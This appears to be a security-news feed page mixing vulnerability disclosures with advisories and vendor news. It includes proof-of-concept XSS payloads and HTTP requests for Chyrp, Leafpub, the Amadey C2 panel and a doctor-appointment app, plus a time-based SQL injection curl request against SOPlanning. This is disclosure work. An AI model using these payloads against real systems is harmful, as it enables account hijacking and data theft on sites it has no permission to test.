Chryp version 2.5.2 suffers from a persistent cross site scripting vulnerability.

    # Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/chyrp/# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip# Version: 2.5.2# Tested on: MacOS### Steps to Reproduce ###- Login from the address: http://localhost/chyrp/?action=login.- Click on 'Write'.- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>- Fill in the 'Body' area and click 'Publish'.- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /chyrp/admin/?action=add_post HTTP/1.1Host: localhostCookie: ChyrpSession=c4194c16a28dec03e449171087981d11;show_more_options=trueUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------28307567523233313132815561598Content-Length: 1194Origin: http://localhostReferer: http://localhost/chyrp/admin/?action=write_postUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="title""><img src=x onerror=alert("Stored")>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="body"<p>1337</p>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="status"public-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="slug"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="created_at"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="original_time"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="trackbacks"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="feather"text-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="hash"11e11aba15114f918ec1c2e6b8f8ddcf-----------------------------28307567523233313132815561598--

Chyrp 2.5.2 Cross Site Scripting

Leafpub version 1.1.9 suffers from a persistent cross site scripting vulnerability.

    # Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/Leafpub# Software Link: https://github.com/Leafpub/leafpub# Version: 1.1.9# Tested on: MacOS### Steps to Reproduce ###- Please login from this address: http://localhost/leafpub/admin/login- Click on the Settings > Advanced- Enter the following payload into the "Custom Code" area and save it: ("><imgsrc=x onerror=alert("Stored")>)- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /leafpub/api/settings HTTP/1.1Host: localhostCookie:authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwloUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 476Origin: http://localhostReferer: http://localhost/leafpub/admin/settingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closetitle=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on

Leafpub 1.1.9 Cross Site Scripting

Panel Amadey.d.c malware suffers from cross site scripting vulnerabilities.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/50467c891bf7de34d2d65fa93ab8b558.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel Amadey.d.cVulnerability: Cross Site Scripting (XSS)Family: AmadeyType: Web PanelMD5: 50467c891bf7de34d2d65fa93ab8b558 (Login.php)SHA256: 65623eead2bcba66817861246e842386d712c38c5c5558e50eb49cffa2a1035dVuln ID: MVID-2024-0680Disclosure: 05/09/2024Description: The Amadey C2 web panel is written in PHP for remote administration capability. The Login.php webpage accepts HTTP GET "l" and "p" parameters which are passed to the backend server side code: $_GET["l"]  name=\"login\",  $_GET["p"] , name=\"password\". However, there is no secure coding practice of filtering input or sanitization of output. Panel users who visit a third-party attacker website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the Amadey web interface.The submit button contains the text "Unlock".Entering incorrect password results in URI of "?wrong=1" and displays "Wrong login or password", after a few seconds delay redirects back to Login.php.http://127.0.0.1/Panel.Amadey.d.c/Login.php?wrong=1Wrong login or passwordThe web panel HTML source code for the URL "Login.php?wrong=1" contains the letters "CC" plus the Domain/IP within brackets[x.x.x.x] within the HTML title tag. %3Ctitle%3E CC [127.0.0.1] %3C/title%3ETested successfully in Firefox.Exploit/PoC:Vulnerable parameters: "l" and "p"http://x.x.x.x/Panel.Amadey.d.c/Login.php?l=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ehttp://x.x.x.x/Panel.Amadey.d.c/Login.php?p=%22/%3E%3Cscript%3Ealert(666)%3C/script%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel Amadey.d.c MVID-2024-0680 Cross Site Scripting

By Waqas
Concerned about a potential MFA bypass in Microsoft Azure Entra ID? This article explores the research, explains the vulnerability in context, and offers actionable steps to secure your organization.
This is a post from HackRead.com Read the original post: Findings Show MFA Bypass in Microsoft Azure Entra ID Using Seamless SSO

Multi-factor authentication (MFA) has become the backbone of cybersecurity for businesses and individuals, adding an extra layer of protection beyond passwords. However, recent Pen Test Partners (PTP) research has identified a potential bypass method for Microsoft Azure Entra ID, a cloud-based identity and access management solution.

****How was the issue discovered?****

The issue was identified during a Red Team engagement when researchers acquired Domain Admin privileges on the on-premises Active Directory network but could not access the sensitive data on Azure cloud estate as it required authenticating with Azure Entra ID.

According to their blog post, the researchers then discovered a method where Azure Seamless Single Sign-On (SSO) allowed users to access Azure Entra ID-protected resources without passwords. This was achieved using two TGS tickets:

1.  HTTP/aadg.windows.net.nsatc.net
2.  HTTP/autologon.microsoftazuread-sso.com

****Bypassing Multi-Factor Authentication on Azure:****

The PTP team successfully bypassed Azure’s MFA requirement for SSO by changing the user-agent of a browser. They used a browser that resembled Chrome on Linux but encountered an error message stating MFA was required.

To bypass MFA, they needed to be on a domain-joined machine, which they did via a proxy. However, their legitimate laptop was locked down, and only Edge and Chrome were installed. They downloaded a portable version of Firefox and installed it on the domain-joined laptop and could successfully bypass MFA. 

****Root Causes of the Issue****

The most common causes of this issue include the addition of a broad bypass to allow automated systems to access Linux without MFA, a misconfiguration of Conditional Access Policies within Entra ID, which dictate when MFA is needed, or an accidental policy disablement. 

The vulnerability is exploitable for specific internal applications, underscoring the importance of proper Entra ID configuration for security. The attack could be repeated to any user, highlighting the importance of strong security measures to protect cloud environments from malicious actors. 

Organizations can mitigate the threat by using up-to-date conditional access policies, patching regularly, monitoring login attempts for anomalies, and exploring additional security layers like endpoint detection and response (EDR) solutions to address known vulnerabilities and improve overall security.

1.  Mirai botnet exploiting Azure OMIGOD vulnerabilities
2.  Microsoft Azure Exploited to Create Undetectable Cryptominer
3.  Microsoft warns of Azure vulnerability exposes users to data theft
4.  Whitehat hackers accessed primary keys of Azure Cosmos DB users
5.  Sensitive source codes exposed in Microsoft Azure Blob account leak

Findings Show MFA Bypass in Microsoft Azure Entra ID Using Seamless SSO

Gentoo Linux Security Advisory 202405-15 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which can lead to remote code execution. Versions greater than or equal to 115.8.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: May 05, 2024  
     Bugs: #925122  
       ID: 202405-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which can lead to remote code execution.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
Package                 Vulnerable     Unaffected  
----------------------  -------------  --------------  
www-client/firefox      < 115.8.0:esr  >= 115.8.0:esr  
                                       >= 123.0:rapid  
                        < 123.0        >= 123.0  
www-client/firefox-bin  < 115.8.0:esr  >= 115.8.0:esr  
                                       >= 123.0:rapid  
                        < 123.0        >= 123.0

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox rapid release users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-123.0"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-123.0"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.8.0:esr"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.8.0:esr"

References  
=========  
[ 1 ] CVE-2024-1546  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1546  
[ 2 ] CVE-2024-1547  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1547  
[ 3 ] CVE-2024-1548  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1548  
[ 4 ] CVE-2024-1549  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1549  
[ 5 ] CVE-2024-1550  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1550  
[ 6 ] CVE-2024-1551  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1551  
[ 7 ] CVE-2024-1552  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1552  
[ 8 ] CVE-2024-1553  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1553  
[ 9 ] CVE-2024-1554  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1554  
[ 10 ] CVE-2024-1555  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1555  
[ 11 ] CVE-2024-1556  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1556  
[ 12 ] CVE-2024-1557  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1557

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-15

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-15

SOPlanning version 1.52.00 suffers from a remote SQL injection vulnerability in projects.php.

    Exploit Title: SOPlanning v1.52.00 'projets.php' SQLiApplication: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.Instructions: Authenticate to the host, the credentials can be obtained using a CSRF exploit (more info included). Once valid credentials are obtained use either a GET/POST request to send the valid parameters that equal to valid SQLi.Vulnerable request parameters for request to "/www/projets.php":filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=testThe above parameters can be sent as either a valid GET/POST request to trigger the SQLi.Example Curl Request To Re-Test SQLi:curl -i -s -k -X $'POST' \    -H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1<http://127.0.0.1/>' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \    -b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D' \    --data-binary $'filtreGroupeProjet=1&statut[]=todo\'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+\'Liquidsky\'=\'Liquidsky&rechercheProjet=test' \    $'http://127.0.0.1/soplanning/www/projets.php'  Note: Cookies need to be authenticated and request needs to be valid for valid SQLi. This curl request can be used with a proxy to reconstruct a valid request.

SOPlanning 1.52.00 SQL Injection

Ubuntu Security Notice 6747-2 - USN-6747-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Bartek Nowotarski discovered that Firefox did not properly limit HTTP/2 CONTINUATION frames. An attacker could potentially exploit this issue to cause a denial of service. Gary Kwong discovered that Firefox did not properly manage memory when running garbage collection during realm initialization. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. Lukas Bernhard discovered that Firefox did not properly manage memory during JIT optimizations, leading to an out-of-bounds read vulnerability. An attacker could possibly use this issue to cause a denial of service or expose sensitive information. Nan Wang discovered that Firefox did not properly manage memory during WASM garbage collection. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. Various other issues were also addressed.

==========================================================================  
Ubuntu Security Notice USN-6747-2  
May 02, 2024

firefox regressions  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

USN-6747-1 caused some minor regressions in Firefox.

Software Description:  
- firefox: Mozilla Open Source web browser

Details:

USN-6747-1 fixed vulnerabilities in Firefox. The update introduced  
several minor regressions. This update fixes the problem.

Original advisory details:

 Multiple security issues were discovered in Firefox. If a user were  
 tricked into opening a specially crafted website, an attacker could  
 potentially exploit these to cause a denial of service, obtain sensitive  
 information across domains, or execute arbitrary code. (CVE-2024-3852,  
 CVE-2024-3864, CVE-2024-3865)

  Bartek Nowotarski discovered that Firefox did not properly limit HTTP/2  
 CONTINUATION frames. An attacker could potentially exploit this issue to  
 cause a denial of service. (CVE-2024-3302)

  Gary Kwong discovered that Firefox did not properly manage memory when  
 running garbage collection during realm initialization. An attacker could  
 potentially exploit this issue to cause a denial of service, or execute  
 arbitrary code. (CVE-2024-3853)

  Lukas Bernhard discovered that Firefox did not properly manage memory  
 during JIT optimisations, leading to an out-of-bounds read vulnerability.  
 An attacker could possibly use this issue to cause a denial of service or  
 expose sensitive information. (CVE-2024-3854, CVE-2024-3855)

  Nan Wang discovered that Firefox did not properly manage memory during  
 WASM garbage collection. An attacker could potentially exploit this issue  
 to cause a denial of service, or execute arbitrary code. (CVE-2024-3856)

  Lukas Bernhard discovered that Firefox did not properly manage memory  
 when handling JIT created code during garbage collection. An attacker  
 could potentially exploit this issue to cause a denial of service, or  
 execute arbitrary code. (CVE-2024-3857)

  Lukas Bernhard discovered that Firefox did not properly manage memory when  
 tracing in JIT. An attacker could potentially exploit this issue to cause  
 a denial of service. (CVE-2024-3858)

  Ronald Crane discovered that Firefox did not properly manage memory in the  
 OpenType sanitizer on 32-bit devices, leading to an out-of-bounds read   
 vulnerability. An attacker could possibly use this issue to cause a denial  
 of service or expose sensitive information. (CVE-2024-3859)

  Garry Kwong discovered that Firefox did not properly manage memory when  
 tracing empty shape lists in JIT. An attacker could potentially exploit   
 this issue to cause a denial of service. (CVE-2024-3860)

  Ronald Crane discovered that Firefox did not properly manage memory when  
 handling an AlignedBuffer. An attacker could potentially exploit this   
 issue to cause denial of service, or execute arbitrary code.   
 (CVE-2024-3861)

  Ronald Crane discovered that Firefox did not properly manage memory when  
 handling code in MarkStack. An attacker could possibly use this issue to  
 cause a denial of service or execute arbitrary code. (CVE-2024-3862)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS  
  firefox                         125.0.3+build1-0ubuntu0.20.04.1

After a standard system update you need to restart Firefox to make all the  
necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6747-2  
  https://ubuntu.com/security/notices/USN-6747-1  
  https://launchpad.net/bugs/2064553

Package Information:  
  https://launchpad.net/ubuntu/+source/firefox/125.0.3+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6747-2

By Cyber Newswire
Early adoption by Fortune 100 companies worldwide, LayerX already secures more users than any other browser security solution and enables unmatched security, performance and experience  
This is a post from HackRead.com Read the original post: LayerX Security Raises $24M for Browser Security: Empowering Secure Remote Work

LayerX, pioneer of the LayerX Browser Security platform, today announced $24 million in Series A funding led by Glilot+, the early-growth fund of Glilot Capital Partners, with participation from Dell Technologies Capital and other investors.

Lior Litwak, Managing Partner at Glilot Capital and Head of Glilot+, and Yair Snir, Managing Partner at Dell Technologies Capital, will join the LayerX board. The new capital will be used for corporate growth across talent and increasing global market presence. This round brings the company’s total investment to $32 million.

Today’s modern enterprise employees rely heavily on browser-based services and SaaS applications. Yet, these fundamental work activities expose organizations to a wide range of security risks, like data leaks, identity and password theft, malicious browser extensions, phishing sites and more. LayerX was purpose-built to secure and govern browser-based work, from both managed and unmanaged devices.

“We’ve transformed workforce protection for organizations without requiring the transition to a dedicated secure browser. Unlike other solutions, installed in a matter of minutes, the LayerX Browser Extension does not impact employee efficiency, speed, privacy or the browsing experience, ” said Or Eshed, co-founder and CEO of LayerX.

“As the browser becomes more central to the employee, we anticipate it becomes more attractive to the attacker, particularly in the wake of GenAI tools used in browser-related activities,” he continues. “Today’s funding round is a testament to our increasing market opportunity and the innovation behind our platform’s user-friendly approach to a more secure browser experience.”

LayerX’s Enterprise Browser Extension is compatible with all commonly used browsers, including Chrome, Firefox, Edge and others, without requiring agents, a VPN or network modifications. Once deployed, the information security or IT team gains visibility into user activities and can block or restrict any threat in real-time, without impacting the user experience.

LayerX protects against all threats, whether they were inadvertently or maliciously caused by the employee, or whether the attacker originated them. The solution includes an AI engine that granularly monitors the code run by the browser and automatically generates a variety of insights related to user behaviour in the browser.

“Since inception, LayerX showed super fast growth and adoption by the world’s leading enterprises. The company is at the forefront of defense for modern organizations. By protecting the browser, the central productivity application in organizations, from a wide range of new-generation security risks, LayerX can solve acute security problems that have remained unanswered until now,” said Kobi Samboursky, Founding and Managing Partner at Glilot Capital “We believe that this novel solution for securing browsers will replace most SASE and SSE solutions prevalent today in organizations. At an estimated market size of $7 billion, the potential inherent in LayerX’s technology is tremendous.”

“Similar to other successful entrepreneurs in the cybersecurity field we’ve collaborated with, Or and David bring significant experience and knowledge in understanding the technical issues involved in threats to organizations and the motivations of attackers.

Consequently, they recognize that effective security measures should adapt to real-world user behaviors, rather than the other way around,” said Yair Snir, Managing Director at Dell Technologies Capital. “In a world where most computer operations are conducted through browsers, LayerX introduces a creative approach to corporate security that is user-friendly, robust, and easily implementable in large organizations.

This approach transforms the browser from a major vulnerability to strength, facilitating secure work across devices. Our investment in LayerX isn’t just driven by the promising opportunity but also by the potential impact of the company’s solution on organizations, regardless of where employees conduct their tasks.”

****About LayerX****

LayerX was founded in 2022 by Or Eshed, CEO, and David Weisbrot, CTO, who developed web attack and defence systems during their military service. In 2017, Eshed led the exposure of the largest attack campaign in history on the Chrome browser, which involved tens of millions of compromised browsers and even led to the capture and trial of the hackers. LayerX has Fortune 100 clients worldwide.

LayerX Enterprise Browser Extension natively integrates with any browser, turning it into the most secure and manageable workspace without impacting the user experience. Enterprises use LayerX to secure their devices, identities, data, and SaaS apps from web-borne threats and browsing risks that endpoint and network solutions can’t protect against. Those include data leakage over the web, SaaS apps and GenAI Tools, malicious browser extensions, phishing, account takeovers, shadow SaaS, and more.

**Contact**

**Dori Harpaz**  
**LayerX**  
**\[email protected\]**

LayerX Security Raises $24M for Browser Security: Empowering Secure Remote Work

Malwarebytes Premium earned "Product of the Year" from AVLab for repeatedly blocking 100% of malware samples used in third-party testing.

After blocking 100% of “in-the-wild” malware samples that were deployed in multiple, consecutive third-party tests conducted by the AVLab Cybersecurity Foundation, Malwarebytes Premium Security has earned “Product of the Year.”

The recognition cements Malwarebytes Premium Security’s perfect record of repeatable, trusted, and proven protection for users. It also comes alongside an additional AVLab certification for “Top Remediation Time.”

The latest results are part of AVLab’s regular “Advanced In-The-Wild Malware Test.”

For the March 2024 evaluation, AVLab tested 459 unique malware samples against 13 cybersecurity products. Malwarebytes Premium Security detected 459/459 malware samples, with a remediation time of 20 seconds—a full 13 seconds faster than the industry average.

ThreatDown, powered by Malwarebytes, also participated in AVLab’s March evaluation, where it similarly blocked 100% of malware samples with a remediation time of 17 seconds.

Three cybersecurity vendors failed to block 100% of the malware samples deployed: Bitdefender, ESET, and Panda.

AVLab’s evaluations, which are performed every other month by a team of cybersecurity and information security experts, are constructed to test and compare cybersecurity vendors against the latest malware that is currently being used by adversaries and threat actors. To ensure that the organization’s evaluations reflect current cyberthreats, each round of testing follows three steps:

1.  **Collecting and verifying in-the-wild malware**: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints.
2.  **Simulating a real-world scenario in testing**: To recreate how a real-life cyberattack would occur, AVLab uses the Firefox web browser to engage with the known, malicious URLs collected in the step prior. In the most recent test, AVLab emphasized the potential for these URLs to be sent over instant messaging platforms, including Discord and Telegram.
3.  **Incident recovery time assessment**: With the various cybersecurity products installed, AVLab measures whether the evaluated product detects a malware sample, when it detects a sample, and how long it took to detect that sample. The last metric is referred to as “Remediation Time.”

Malwarebytes is proud to receive “Product of the Year” and “Top Remediation Time” from AVLab, and is thankful to the third-party tester for its important work in the industry.

 Malwarebytes Premium Security earns &#8220;Product of the Year&#8221; from AVLab 

Doctor Appointment Management System version 1.0 suffers from a cross site scripting vulnerability.

# Application Name: Doctor Appointment Management System  
# Software Link: [Download Link](https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/)  
# Vendor Homepage: [Vendor Homepage](https://phpgurukul.com/)  
# BuG: XsS  
# BUG_Author: SoSPiro  
# Version: 1.0  
# CVE: CVE-2024-4293

### Vulnerable code section:

- `http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php`  
- **`Lines 57-61`**

- Parameter `$fdate=$_POST['fromdate'];` and `$tdate=$_POST['todate']`

 ```php  
<?php  
$fdate=$_POST['fromdate'];  
$tdate=$_POST['todate'];  
?>  
<h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5>

```  
- The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

### Vulnerability Description:

- The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.

### Proof of Concept (PoC)

- Poc Video : [Video Link](https://drive.google.com/file/d/1X7OPM1_Sb-xeIZO8ZdXekLtinUqzVdLx/view?usp=sharing)

- Poc Video2: [Video Link](https://drive.google.com/file/d/1V6TP9ecAGUbsLvupE_7aQ8lkn_h5Jm18/view?usp=sharing)

```http

POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 60  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php  
Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
X-PwnFox-Color: blue

fromdate=<script>alert(1)</script>&todate=2024-04-18&submit=

```

- In this POST request, an attacker has included a script tag in the "fromdate" and "todate" field:

`<script>alert(1)</script>`

- Upon successful exploitation, an alert box containing the text "1" will be displayed on the victim's browser, indicating that the XSS vulnerability has been successfully exploited.

### Impact:

- The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website.

### Reproduce:

- [ -vuldb.com- ](https://vuldb.com/?id.262225)

- [  -cve.org- ](https://www.cve.org/CVERecord?id=CVE-2024-4293)

- [ -github- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss.md)

- [ -github2- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss2.md)

Tag

#firefox